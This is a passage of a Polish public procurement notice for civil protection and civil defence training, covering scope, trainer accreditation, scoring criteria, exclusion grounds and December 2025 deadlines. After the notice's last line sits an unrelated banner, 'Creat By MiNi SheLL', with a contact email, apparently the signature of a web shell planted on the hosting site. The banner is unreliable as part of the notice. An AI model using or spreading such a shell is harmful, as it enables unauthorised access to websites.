2025.<br/><br/>Celem szkolenia jest przygotowanie kadry podmiotów ochrony ludności do efektywnej realizacji zadań z zakresu ochrony ludności i obrony cywilnej.<br/>Zajęcia obejmują część teoretyczna i praktyczną.<br/>Część teoretyczna prowadzona jest metodą wykładu konwersatoryjnego<br/>Zajęcia dydaktyczne w części praktycznej szkolenia są prowadzone z zastosowaniem w szczególności metody problemowej, studium przypadku oraz instruktażu.<br/><br/>Zakres tematyczny:<br/>- uwarunkowania ochrony ludności i obrony cywilnej w Polsce, w tym zagrożenia społeczności lokalnej i zapewnianie ciągłości działania;<br/>- urząd w systemie ochrony ludności i obrony cywilnej - rola, funkcje, zadania i sposoby ich realizacji;<br/>- funkcjonowanie urzędu w stanach nadzwyczajnych oraz w czasie wojny;<br/>- przygotowanie i planowanie w ochronie ludności i obronie cywilnej, w tym planowanie ciągłości działania;<br/>- współpraca, wsparcie i współdziałanie w ochronie ludności i obronie cywilnej;<br/>- wykrywanie zagrożeń, powiadamianie, ostrzeganie i alarmowanie; Komunikacja kryzysowa i komunikacja ryzyka;<br/>- działania pomocowe w warunkach obrony cywilnej;<br/>- ewakuacja oraz środki indywidualnej i zbiorowej ochrony.<br/><br/><br/>4.3 Zamówienie realizowane w ramach „Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026”, finansowanego z dotacji udzielonej przez Ministerstwo Spraw Wewnętrznych i Administracji.<br/><br/>4.4 Szkolenia może prowadzić wyłącznie Wykonawca spełniający wymagania określone w §11 ust. 1 pkt 3 rozporządzenia w sprawie programu szkoleń. W przypadku osoby fizycznej, osoby prawnej lub jednostki organizacyjnej nieposiadającej osobowości prawnej, w celu potwierdzenia spełniania wymagań, o których mowa w §11 rozporządzenia w sprawie programu szkoleń, Wykonawca zobowiązany jest złożyć<br/>przed zawarciem umowy informację o wyniku weryfikacji przeprowadzonej przez Akademię Pożarniczą.<br/><br/>4.5 CPV: <br/>Cz. A: 80600000-0 usługi szkolenia w zakresie obrony i materiałów bezpieczeństwa.<br/>Cz. B: 80600000-0 usługi szkolenia w zakresie obrony i materiałów bezpieczeństwa<br/><br/><br/>4.6 Szczegółowy opis zakresu przedmiotu zamówienia na cz. A, B zawarty został w niniejszej SWZ oraz w załączniku Nr 1 do SWZ, na który składają się opis przedmiotu zamówienia <br/><br/>Czas trwania szkolenia: 32 jednostek dydaktycznych – 4 dni robocze (1 jednostka dydaktyczna = 45 minut).<br/>Szkolenie powinno odbywać się w dniach roboczych od poniedziałku do piątku (bez sobót, niedziel i dni ustawowo wolnych) w godzinach 08:00-16:00<br/>Wykonawca jest zobowiązany do prowadzenia list obecności uczestników oraz sporządzenia raportu z realizacji szkolenia.<br/>W szkoleniu weźmie udział 60 osób w podziale na 3 grup liczących po maksymalnie 20 osoby każda.<br/>Zajęcia obejmują część teoretyczna i praktyczną.<br/>Rozkład zajęć: 50 % zajęcia teoretyczne, 50 % zajęcia praktyczne.<br/><br/>4.8 Wykonawca zobowiązany jest wynająć sale szkoleniową spełniającej wymogi BHP.<br/><br/>4.9 Na 2 dni przed terminem szkolenia Zamawiający dostarczy wykonawcy listę osób<br/>uprawnionych/skierowanych na szkolenie (dotyczy cz. A i B)<br/><br/>4.10 Na 3 dni przed realizacją przedmiotu zamówienia Wykonawca przedstawi Zamawiającemu harmonogram przeprowadzenia szkolenia (dotyczy cz. A i B)<br/><br/>4.12 Termin przeprowadzenia szkolenia będzie uzgodniony 2 dni po podpisaniu umowy. Zmiana terminu szkolenia będzie możliwa wyłącznie z inicjatywy Wykonawcy lub Zamawiającego, wyłącznie w uzasadnionych przypadkach, po uprzednim uzyskaniu akceptacji przedstawiciela drugiej strony.<br/>Zamawiający przewiduje możliwość realizacji przedmiotu zamówienia w 2026 r. s sytuacji gdy będzie możliwość przesunięcia środków finansowych na realizację zamówienia na następny rok.<br/>Zamawiający zastrzega sobie prawo do weryfikacji osób wyznaczonych do realizacji szkolenia wskazanych w formularzu ofertowym, w szczególności w zakresie ich kwalifikacji zawodowych, doświadczenia oraz posiadanych uprawnień (doświadczenie stanowiło podstawę przyznania punktów kryterium oceny ofert „Doświadczenie osób wyznaczanych do realizacji zamówienia” ).<br/>W przypadku stwierdzenia, że przedstawione osoby nie spełniają wymagań określonych w SWZ, Zamawiający może zażądać ich zastąpienia innymi osobami o kwalifikacjach nie niższych niż wymagane<br/><br/>4.14 Zamawiający wymaga akredytacji Akademii Pożarniczej w Warszawie, z którego wynika, że Wykonawca spełnia wymagania do prowadzenia szkoleń, o których mowa w art. 50 ust. 3 ustawy z dnia 5 grudnia 2024 o ochronie ludności i obronie cywilnej (Dz.U. z 2024 r. poz. 1907) oraz w § 11 ust. 1 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lutego 2025 roku w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia (DZ. U. poz.162).<br/><br/>W przypadku, gdy Wykonawca jest podmiotem upoważnionym, na podstawie §11 Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 06 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia (Dz. U. z 2025 r., poz. 162) bez konieczności weryfikacji przez Akademię Pożarniczą jest obowiązany złożyć stosowne oświadczenie.<br/><br/>UWAGA: Wykonawca w formularzu ofertowym złoży stosowane oświadczenie o posiadaniu akredytacji Akademii Pożarniczej w Warszawie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 75609,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80600000-0 - Usługi szkolenia w zakresie obrony i materiałów bezpieczeństwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował niżej podanymi kryteriami i ich <br/>wagami:<br/><br/>A) Cena – waga kryterium – 60 %<br/><br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej ofercie przyporządkowana <br/>zostanie liczba punktów proporcjonalnie mniejsza stosując wzór:<br/><br/><br/> najniższa cena z rozpatrywanych ofert<br/>Wartość punktowa ceny = ----------------------------------------------------- x 60<br/> cena badanej oferty<br/><br/> B) Doświadczenie osób wyznaczonych do realizacji zamówienia – waga kryterium - 40 % <br/><br/>* ( dotyczy cz. A, B )<br/><br/>- dysponuje min. 2 osoby posiadające odpowiednie kwalifikacje zawodowe i doświadczenie dydaktyczne w prowadzeniu zajęć z tematyki objętej szkoleniem, zatrudnione na podstawie stosunku pracy lub stosunku cywilno-prawnego, z których każda spełnia co najmniej jeden z warunków wskazanych w § 11 ust. 1 pkt 3 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia, <br/>1)	posiada co najmniej stopień naukowy doktora w dyscyplinach naukowych w zakresie nauk o bezpieczeństwie, nauk o obronności, nauk wojskowych albo inżynierii bezpieczeństwa oraz wykazał dorobek naukowy w okresie ostatnich 5 /pięciu/ lat związany z tematyką prowadzonych zajęć dydaktycznych oraz udokumentowane doświadczenie dydaktyczne.<br/>2) posiada tytuł zawodowy magistra inżyniera pożarnictwa i co najmniej 5 /pięć/ lat stażu pracy lub służby w jednostkach ochrony przeciwpożarowej lub komórkach organizacyjnych administracji publicznej związanych z ochroną ludności, obroną cywilną lub zarządzaniem kryzysowym oraz udokumentowane doświadczenie dydaktyczne.<br/>3)	posiada tytuł zawodowy magistra lub magistra inżyniera na kierunku studiów związanym z bezpieczeństwem i co najmniej 5 /pięć/ lat stażu pracy lub służby w komórkach organizacyjnych administracji publicznej związanych z ochroną ludności, obroną cywilną lub zarządzaniem kryzysowym oraz udokumentowane doświadczenie dydaktyczne<br/>4)	posiada udokumentowane doświadczenie dydaktyczne i co najmniej 10 /dziesięć/ lat stażu pracy lub służby w komórkach organizacyjnych administracji publicznej związanej z ochroną ludności, obroną cywilną lub zarządzaniem kryzysowym.<br/><br/>Jeżeli Wykonawca wykaże, że osoba skierowana do realizacji zamówienia, spełniająca wymagania, o których mowa w § 11 ust. 1 pkt 3 Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia, w ciągu ostatnich 3 lat przed upływem terminu składania ofert przeprowadziła:<br/><br/>a) 1-2 szkolenia w wymiarze co najmniej 5 godzin (każde szkolenie) z zakresu zarządzania kryzysowego, bezpieczeństwa lub ochrony ludności (obrony cywilnej) - Wykonawca otrzyma 10 punktów za każdą osobę,<br/>b) 3 i wiecej szkoleń w wymiarze co najmniej 5 godzin (każde szkolenie) z zakresu zarządzania kryzysowego, bezpieczeństwa lub ochrony ludności (obrony cywilnej) - Wykonawca otrzyma 20 punktów za każdą osobę;<br/><br/>UWAGA: W sytuacji, gdy Wykonawca nie złoży w ofercie oświadczenia w zakresie doświadczenia dwóch osób skierowanych do prowadzenia zajęć dydaktycznych w trakcie realizacji zamówienia oferta otrzyma 0 pkt; <br/><br/>W sytuacji, gdy Wykonawca złoży w ofercie oświadczenia w zakresie doświadczenia tylko jednej osoby skierowanej do prowadzenia zajęć dydaktycznych w trakcie realizacji zamówienia oferta otrzyma punkty tylko za wykazane doświadczenie tej osoby; <br/>Wykonawca może uzyskać za doświadczenie jednej osoby nie więcej niż 20 pkt, zaś w tym kryterium maksymalnie 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz oświadczeń i<br/>dokumentów – podmiotowych środków dowodowych, wymaganych na potwierdzenie spełniania warunków udziału w postępowaniu,<br/>wskazujących brak podstaw do wykluczenia.<br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie<br/>art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji<br/>*Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o<br/>których mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju<br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania ma osoba,<br/>której dokument miał dotyczyć.<br/>Zastępczy dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają wymagane przez<br/>Zamawiającego dokumenty zgodnie z rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.<br/>U. poz. 2415)<br/>b) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę/ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej<br/>c) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego w pkt 21 SWZ, o którym mowa m.in. w § 2 ust. 1<br/>pkt 7 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020.2415)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) *Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego do złożenia oferty musi być<br/>złożone w oryginale w takiej samej formie jak składana oferta (tj. w formie elektronicznej lub w postaci elektronicznej,<br/>opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego<br/>poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego1991 r. – prawo o notariacie, które to<br/>poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym bądź też poprzez opatrzenie skanu<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez<br/>upełnomocnionego. (*jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 2 do oferty.<br/>b) *Zobowiązanie podmiotów, na których zdolnościach technicznych, zawodowych, sytuacji finansowej lub ekonomicznej<br/>polega Wykonawca do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>zamówienia podpisane: kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym podmiotu<br/>udostępniającego zasoby. ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 3 do oferty.<br/>c) *Oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy składający ofertę wspólnie, podpisane<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 4 do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 58 ust. 1 ustawy Pzp.<br/>Wykonawcy występujący wspólnie zobowiązani są dołączyć do oferty dokument (pismo, oświadczenie) wskazujący<br/>ustanowionego pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Dokument ten musi być wystawiony zgodnie z wymogami ustawowymi, podpisany przez prawnie upoważnionych<br/>przedstawicieli wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. Zgodnie z art. 445 ust.1 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu niespełniania warunków, o których mowa w pkt. 10.1a SWZ.<br/>4. Jeśli wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to:<br/>a) warunek określony w pkt 10.1.4 lit. a SWZ musi spełniać przynajmniej jeden z Wykonawców (Partnerów) składających<br/>ofertę wspólną<br/>b) pozostałe warunki określone powyżej musi spełniać co najmniej jeden z Partnerów składających ofertę wspólną lub<br/>Partnerzy składający ofertę wspólną spełniają łącznie.<br/>5. W wypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają roboty budowlane lub usługi, do których realizacji te zdolności są wymagane. W takim<br/>wypadku należy złożyć Zamawiającemu oświadczenie do oferty, z którego wynika które roboty budowlane lub usługi<br/>wykonają poszczególni Wykonawcy składający ofertę wspólnie.<br/>6. W przypadku wykonawców wspólnie realizujących zamówienie (w tym konsorcjum) Zamawiający dokonywać będzie<br/>bezpośrednich rozliczeń tylko z liderem konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 5.1 Wymagany termin realizacji przedmiotu zamówienia (dla części A, B) : <br/>nie później niż do 20.12.2025 r. <br/><br/>Zmiana terminu szkolenia będzie możliwa wyłącznie z inicjatywy Wykonawcy lub Zamawiającego, wyłącznie w uzasadnionych przypadkach, po uprzednim uzyskaniu akceptacji przedstawiciela drugiej strony.<br/>Zamawiający przewiduje możliwość realizacji przedmiotu zamówienia w 2026 r. w sytuacji przesunięcia środków finansowych na realizację zamówienia na następny rok.<br/><br/>5.2 Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej <br/>umowy odnośnie wydłużenia terminu realizacji z pkt. 5.1 SWZ:<br/><br/>1. Z uwagi na masowe występowanie choroby zakaźnej ludzi mające bezpośredni lub pośredni wpływ na terminową realizację niniejszego zadania.<br/>2. Z powodu działania siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki <br/>zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub <br/>zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.<br/>3. Z przyczyn niezależnych od Zamawiającego i Wykonawcy (zdarzenia/osoby trzecie), mających wpływ na terminowe wykonanie przedmiotu zamówienia.<br/>4. Z przyczyn zależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy.<br/> <br/><br/>5.3 Zmiana terminu realizacji zamówienia wynikająca z ewentualnych powyższych przesłanek zostanie <br/>wprowadzona w formie aneksu do umowy.<br/><br/>5.4 Przedmiot umowy realizowany będzie według harmonogramu opracowywania dokumentacji (Wykonawca przedstawi zamawiającemu do akceptacji harmonogram), który będzie załącznikiem Nr 2 do umowy dostarczony najpóźniej na 3 dni przed podpisaniem umowy. <br/><br/>Wykonawca zobowiązany jest przestrzegać wspólnie ustalonych terminów pośrednich wykonania dokumentacji oraz kolejności ich realizacji. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-04 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2026-01-02</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena - 60%<br/>Doświadczenie osób wyznaczonych do realizacji zamówienia – waga kryterium - 40 % <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, w stosunku do którego zaistnieją przesłanki<br/>wymienione w art. 108 ust. 1 ustawy Pzp (z zastrzeżeniem art. 110 ust. 2 ustawy Pzp) oraz określonych w art. 7 ust. 1 pkt 1-<br/>3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025 r. poz. 514)

Creat By MiNi SheLL
Email: jattceo@gmail.com